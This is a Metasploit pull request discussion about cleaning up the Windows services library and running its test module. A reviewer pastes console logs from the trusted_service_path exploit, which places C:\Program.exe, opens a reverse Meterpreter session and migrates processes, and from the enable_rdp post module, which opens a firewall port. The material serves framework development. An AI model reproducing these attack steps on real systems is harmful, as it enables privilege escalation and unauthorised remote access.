Cleanup Post::Windows::Services

[jlee-r7]

No description provided.

[jvazquez-r7]

Fast eyeball, looks good for me, only some comments:

• The "run" method in the test module is full commented.
• The test module isn't msftidy compliant, not a problem I suppose.
• What about the "service_query_ex" and "service_query_info" presents in the test module? Are they available? Is work in progress? (sure dummy questions, sorry).

[jlee-r7]

run is commented out intentionally. This module was written before any of the testing system was in place, so it used a more manual approach. I didn't want to lose any of that original code, so it's commented out.

It was originally intended to test @kernelsmith 's enhancements for manipulating services over command shells as well as meterpreter. If and when we ever get to a point where that can be merged into master, we will need to revisit the old tests in run

[jlee-r7]

See #1013

[todb-r7]

I'm going to pick this up after this week's release has been cut. It's a lot of changes that I'm not fully understanding yet.

[wchen-r7]

Reviewing...

[wchen-r7]

Tested existing msf modules, all function fine:

Tested a local exploit trusted_service_path:

msf  exploit(trusted_service_path) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.0.1.3:4444 
[*] Finding a vulnerable service...
[*] Found vulnerable service: OpenSSHd - C:\Program Files\OpenSSH\bin\cygrunsrv.exe (LocalSystem)
[*] Placing C:\Program.exe as OpenSSHd
[*] Writing 73802 bytes to C:\Program.exe...
[*] Launching service OpenSSHd...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.6:1581) at 2012-12-21 23:53:57 -0600
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.6:1581) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: Program.exe (2692)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3860
[+] Successfully migrated to process

Tested a post module:

msf  post(enable_rdp) > rexploit
[*] Reloading module...

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /Users/sinn3r/.msf4/loot/20121222001455_default_10.0.1.6_host.windows.cle_374266.txt
[*] Post module execution completed
msf  post(enable_rdp) >

But how do I run the test module? It's not loaded by msfconsole, and then everytime I move to somewhere loadable I get: NameError uninitialized constant Msf::ModuleTest. I'm also not finding any documentation about this.

[jlee-r7]

@wchen-r7 loadpath test/modules and then use it like any other post mod

[wchen-r7]

Better now, thx:

[*] Running against session 1
[*] Session type is meterpreter and platform is x86/win32
[+] should start W32Time
[+] should stop W32Time
[+] should list services
[+] should return info on a given service
[+] should create a service
[+] should return info on the newly-created service
[+] should delete the new service
[*] Passed: 7; Failed: 0
meterpreter >